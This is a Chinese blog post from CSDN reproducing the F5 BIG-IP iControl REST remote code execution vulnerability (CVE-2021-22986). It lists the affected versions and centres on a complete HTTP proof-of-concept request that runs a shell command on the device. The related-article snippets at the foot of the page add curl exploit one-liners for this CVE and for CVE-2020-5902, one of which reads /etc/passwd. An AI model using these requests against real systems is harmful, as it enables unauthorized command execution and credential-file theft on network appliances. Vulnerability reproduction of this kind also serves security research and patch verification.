F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)

最新推荐文章于 2024-03-13 10:34:15 发布
最新推荐文章于 2024-03-13 10:34:15 发布
阅读量3.5k 收藏 4
点赞数 1
分类专栏: 网络安全 漏洞复现 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37602797/article/details/115030742
版权

F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)

一、简介

该漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。

二、影响版本

F5 BIG-IP 16.x: 16.1.0.3

F5 BIG-IP 15.x: 15.1.0.4

F5 BIG-IP 14.x: 14.1.2.6

F5 BIG-IP 13.x: 13.1.3.4

F5 BIG-IP 12.x: 12.1.5.2

F5 BIG-IP 11.x: 11.6.5.2

三、漏洞复现

POC:

POST /mgmt/tm/util/bash HTTP/1.1

Host: 127.0.0.1

Connection: close

Content-Length: 47

Cache-Control: max-age=0

Authorization: Basic YWRtaW46QVNhc1M=

X-F5-Auth-Token:

Upgrade-Insecure-Requests: 1

Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}

执行效果:

编写检测脚本:

参考:

https://mp.weixin.qq.com/s/ZtE7R4PPgdWY9ea06A9wqQ

https://mp.weixin.qq.com/s/ZpbJwQ3tTNvSKCIRrPl3hg

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article

语雀博客主页:https://www.yuque.com/thelostworld

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

 

thelostworld-公众号
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
F5 BIG-IP Next Central Manager SQL注入漏洞(CVE-2024-26026、CVE-2024-21793)
0xSec
05-10 821
当启用 LDAP时,BIG-IP Next Central Manager 版本20.0.1 - 20.1.0的API (URI) 中存在OData 注入漏洞,该漏洞存在于Central Manager 处理 OData 查询的方式中,可能导致未经身份验证的威胁者注入OData 查询过滤器参数,从而获取敏感信息,如管理员密码哈希等。
F5 LTM 知识点和实验 1-BIG-IP 系统介绍
cnxhsy的博客
07-25 897
一个网络设备如果是基于包转发的,则他是一个会话流(communication stream)的中间设备,而不是端点(endpoint)的设备,比如,路由器改变了二层报文信息,但是他仅仅只转发了这个数据报文,却无法对更高层级的数据进行解析。
F5 BIG-IP iControl RCE (CVE-2021-22986)
MD@@nr丫卡uer
03-19 2489
漏洞描述 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 1、CVE-2021-22986 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞 中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。 2、CVE-2021-22987 BIG-IP TMUI 后台远程代码执行漏洞 中,经过身份验证的用户可构造恶意请求,执行任意系统命令。 3、CVE-2021-22988 BIG
f5_rce_poc:cve-2021-22986 f5 rce扩展批量检测poc
03-25
使用 python3 f5_rce.py -u 指定目标URL -f 批量检测文件 -c 执行命令 效果如下所示: PS:输出不够美感,我会修改的 :beaming_face_with_smiling_eyes: 问题 该POC目前只能支持部分命令,执行history , ls等失败,原因未知 后续 更新:修改部分命令执行异常情况 正则匹配,美化输出 更新其他POC利用方式 引用
F5 BIG-IP 远程代码执行
自强不息
06-15 145
时间是最好的老师,但遗憾的是——最后他把所有的学生都弄死了 漏洞描述 ​未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。该漏洞影响控制面板受影响,不影响数据面板。 漏洞复现
CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞
weixin_51387754的博客
11-03 405
漏洞简介 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 近日,F5发布了F5 BIG-IQ/F5 BIG-IP 代码执行代码执行的风险声明,F5安全公告更新了BIG-IP,BIG-IQ中的多个严重漏洞。建议广大用户及时将f5 big-iq,f5 big-ip升级到最新版本,避免遭到攻击。 影响版本: F5 BIG-IP 16.x: 16.1.0.3 F5 BIG-IP 15.x: 15.1.0.4 F5 BIG-IP 14.x: 14.1
F5 BIG-IP LTM基础资料
weixin_43445237的博客
12-06 3671
F5 BIG-IP LTM相关知识学习
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
CVE-202122986-EXP:F5 BIG-IP远程代码执行cve-2021-22986,批量检测;命令执行利用
04-01
F5 BIG-IP远程命令执行突破(CVE-2021-22986) 进攻影响 F5 BIG-IP 16.x:16.1.0.3 F5 BIG-IP 15.x:15.1.0.4 F5 BIG-IP 14.x:14.1.2.6 F5 BIG-IP 13.x:13.1.3.4 F5 BIG-IP 12.x:12.1.5.2 F5 BIG-IP 11.x:...
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞.md
04-23
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞
CVE-2021-22986:CVE-2021-22986和F5 BIG-IP RCE
03-25
漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。 此漏洞只能通过控制平面利用,而不能通过数据平面利用。 剥削...
CVE-2021-22986-Poc:这是BIGIP iControl取消身份验证RCE的Poc
03-25
CVE-2021-22986-Poc 这是BIGIP iControl取消身份验证RCE的Poc POC:〜 curl -ksu管理员:[已删除] -d'{“ filePath”:“ id ”}'| jq。 curl -ksu: ://192.168.123.134/mgmt/shared/authn/login -d'{“ bigipAuthCookie”:“”,“ loginReference”:{“ link”:“ '| jq。 curl -su管理员:-H“内容类型:application / json” -d'{“ command”:“ run”,“ utilCmdArgs”:“-c id“}'| jq。 参考: :
F5 BIG-IP LTM 负载均衡器 功能介绍 上篇
changyanmanman的专栏
05-11 5352
F5 BIG-IP本地流量管理器(LTM)可将网络转变为灵捷的应用交付基础架构。它是用户和应用服务器之间的全代理,它创建了一个提取层,用于确保应用流量的安全,并对应用流量进行优化和负载均衡。这样,您便可以全面控制您的网络,不但可以轻松添加服务器、消除业务中断、提高应用性能,还可以满足安全要求。简单的说是一个负载均衡器负载均衡器是一种采用各种分配算法把网络请求分散到一个服务器集群中的可用服务器上去,
CVE-2020-5902 F5 BIG-IP 远程代码执行RCE
weixin_41082546的博客
07-06 208
cve-2020-5902 : RCE: curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' Read File: curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
F5是什么意思?从BIG-IP Next核心价值了解F5
最新发布
hanniuniu13的博客
03-13 466
比如在BIG-IP Next中,BIG-IP Next CM发挥了关键作用,有效解决了当前的管理问题。在这样的需求下,F5推出BIG-IP Next(下一代BIG-IP 软件),以更好地支持未来的应用环境。区别于BIG-IP(TMOS),BIG-IP Next 最大的变化是利用容器技术将控制平面和数据平面分开,容器化的功能单元提高整体性能和可管理性。”这个话题,从BIG-IP Next中我们可以了解到,F5 坚持科技创新,致力于为企业的数字化转型保驾护航,也在将更美好的数字世界融入每个人的生活。
F5社区好文推荐:BIG-IP双机高可用配置
f5networks的博客
10-10 770
在生产级环境下,需考虑BIG-IP高可用。此时需CES对接BIG-IP AFM多实例集群。CES对接AFM集群有两种方式:
F5 BIG-IP CVE-2020-5902 漏洞利用
weixin_46137328的博客
07-07 455
0x00 漏洞概述7月1日,F5发布公告,其流量管理用户接口(Traffic Management User Interface ,简称TMUI),也称为配置实用程序(Configura...
F5紧急修复严重的 BIG-IP 预认证 RCE 漏洞
smellycat000的专栏
03-11 793
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队全球顶级企业网络设备巨头 F5 Networks 发现影响多数 BIG-IPBIG-IP软件版本的四个严重的远程代码执行...
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值